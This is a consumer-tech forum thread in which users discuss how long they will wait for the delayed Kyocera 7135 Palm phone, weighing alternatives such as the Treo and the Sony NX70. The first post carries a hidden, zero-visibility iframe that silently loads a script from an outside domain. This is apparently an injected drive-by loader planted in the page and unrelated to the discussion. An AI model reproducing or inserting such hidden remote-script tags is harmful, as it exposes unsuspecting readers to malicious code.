Poll: How long will you wait?

+ Reply to Thread
Page 1 of 2 1 2 LastLast

How long will you wait?

I know this has been discussed in the ‘Dark Side‘ thread, but I am curious as to just how strong the ‘force’ is.
    Also, just in case someone from Kyocera is listening, and the delay is on their end…

How much longer will you wait for the 7135 before pursuing another option?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

If the delay is arbitrary and the decision of Kyocera or Sprint/Verizon, it is a seriously BAD decision! After the Holiday Season, all the disposable income is GONE. No phone before year end, forget it.

(Of course, if someone would let me have my 7130 NOW, I would gladly delete this entry... <g>)

I'm at least going to wait till after December 9th.

After then it's kinda up for grabs.

I'll probably go to a basic Vision phone or maybe jump on into the Darkside completely.

And get a Treo Although if I go Treo it will be after Xmas.
    Remember, When the long night comes return to the end of the beginning.

Long time lurker, first time poster...

My roommate had a 6035 when I moved in (still does.) I fell in love with it, but he convinced me to wait for the 7135. Now, months later, I am close to giving up. I can only wait so long. I'll have a new pda/phone combo under my tree this year one way or the other.

I've resigned myself to waiting as long as necessary.

It's a great pda/phone feature set, it supports analog, and it's on Verizon...Everything I want.

Being unwilling to swithc from Verizon doesn't leave me many options though...
    ... M A L I A L ...
    ... designer | mac OS X | windows XP ...
    ... email

... waiting for the big
    V to wake up and smell the smartphone....

Well.... I'm obviously on the Dark Side.... but I wouldn't say that I have given up! I'll be at the front of the line when the 7135 comes out
    Please visit my picture site: Robert-O-Rama :)

I don't see any better options with Verizon, and I am not moved enough by the Treo to switch to Sprint. If something better then the 7135 (I don't think anything that has been announced yet so perfectly meets my needs though) is released first, I might jump ship, but otherwise, I am OK with my trusty old StarTac and PalmIIIc. I am getting a bit antsy for Express Network data speeds, but maybe if I wait long enough, they will lower the price to be competetive with Vision

I may go nuts waiting, but it will be worth it.
    The one who dies with the most toys WINS :-)

I getting near impatient, but I will wait forever.

But I don't mind waiting until Dec 21! why? cause my Verizon new every two plan activates then & I can save $100 bucks off on my 7135 on that day. That and I plan to give my GF my old Palm on Christmas, so If I got it too early she'd know and "the jig is up"

But whats got me impatient now is that the last time I put a headset into my phone, it worked fine and once I took it out, I can't get the internal speaker to work again!! :/ I have to carry the earpiece in my pocket and plug it in every time--- so i definatly don't want one of those tungsten W or whatever PDA requires a headset to function!!
    iPhone therefore iAm.

I guess I'm stuck on the dark side. Three years ago I bought a Neopoint while waiting for the PDQ, and now I've bought a Hitachi P300 to get by for a few more years....

Carl

Well, it looks like there are a lot of people still holding down the 7135 fort.......... while I'm comfortably hanging out in my Treo house

I know a lot of us are frustrated now........ but I'd say 95% of the people who originally wanted the 7135 so badly will still get it when it comes out I know I will!

I'll hold out only until something comes available on VZW.

Form factor and expansion are what i'm most excited about.

While waiting for the 7135, it occurred to me that 99% of my use will be the Palm, with very little use (um, let's see...1%) as a phone. The phone was just useful in case I occasionally need to make/take a call.

I decided that, while the 7135 is good for what it is, its small lo-res screen would hinder my PDA use (the 99%).

So I decided to buy a nice no-compromise Palm (big hi-res screen) and get a separate cheap phone. This should tide me over until smartphones come in form factors with big screens (kind of like the new PocketPC phones).

So I bought a Sony NX70 last week and have been in geek heaven since. I'm running my outliner app with small fonts and the Graffiti area collapsed, and I'm seeing 3 times the amount of text as on my old Visor. This screen is a knockout.

Just need to get a basic CDMA 1X phone to toss in my bike bag.

For those of you still waiting for a converged device, I'll continue to hope the 7135 gets its butt out on the market soon.

http://www.fly-to-australia.com/

:upsidedow

Can’t wait any longer…

Just bought a plane ticket to Australia…

Hopefully wife and job waiting when I return, but must have 7135 now…

Re: http://www.fly-to-australia.com/

Originally posted by cammoore
    :upsidedow

Can’t wait any longer…

Just bought a plane ticket to Australia…

Hopefully wife and job waiting when I return, but must have 7135 now…
    LOL

:biglaughb

I just refinanced my house. I get to skip two house payments. Hopefully, I will be able to use the extra cash for my 7135, but I will wait as long as it takes.
    Nicky

Re: Re: http://www.fly-to-australia.com/

Originally posted by nsanders
    LOL

:biglaughb

I just refinanced my house. I get to skip two house payments. Hopefully, I will be able to use the extra cash for my 7135, but I will wait as long as it takes.
    You da woman! I'm impressed with the patience that some of you have! :clap

But don't forget that I'll be right there with you when the 7135 comes out! :drink1

Re: Re: http://www.fly-to-australia.com/

Originally posted by nsanders
    When I saw this, I remembered that I am supposed to be getting some escrow back on my refi too - just checked and the check will be here by 12/12 - woo hoooo!!

7135 App Developer davewalthall's Avatar
    I want mine to be a phone first and a palm second. Just about everything about the 7135 is exactly as I would have made it, so I'll wait forever. (I only wish it had 802.11b built-in and a CF slot as well as SD.)

David
    char *p="char *p=%c%s%c;main(){printf(p,34,p,34);}";main(){printf(p,34,p,34);}

Anti-7135

Call me frugal - but I don't see the "big leap" that the 7135 has over the 6035 for the assumed $500+ cost to upgrade. The 6035 has served me immensely well since 5/01 (even though I've been through 4 of the phones - Thanks Verizon for free swaps!).

The only items I see that the 7135 has over the 6035 are:

1. +8MB
    2. Exp Slot
    3. Color Screen
    4. MP3 ability (whoopy-S%&$).

I'll stick with my 6035 (which is still light-years ahead of what most other road-warriors have anyways) until the organic-interface version is launced.

PS - during my last swap, I've found that I no longer have to soft-reset my phone to sync my contacts list. Was there a thread a missed about the software upgrade??

DBlakely,
    For anyone who uses their 6035 to it's fullest capability will soon find out that the mere 8 MB's of ram is inadequate. The Palm OS is very powerful and when coupled with the limitless expansion of an SD card, you can walk around with Entire Encyclopedia's and dictionaries in your hand, many of which total over 10 MB in size. My palm m505 has saved me in a pinch on numerous occasions with the dictionary alone. Couple that with being able to have several hundred apps on the card and the value of your $500 investment has increased significantly. The color screen opens the scope of software available to run on your device that much more, furthur increasing your palms value.

Just a few things to think about.
    You should be 10% smarter than the equipment you operate. For some of you, the 7135 is not the best choice of equipment.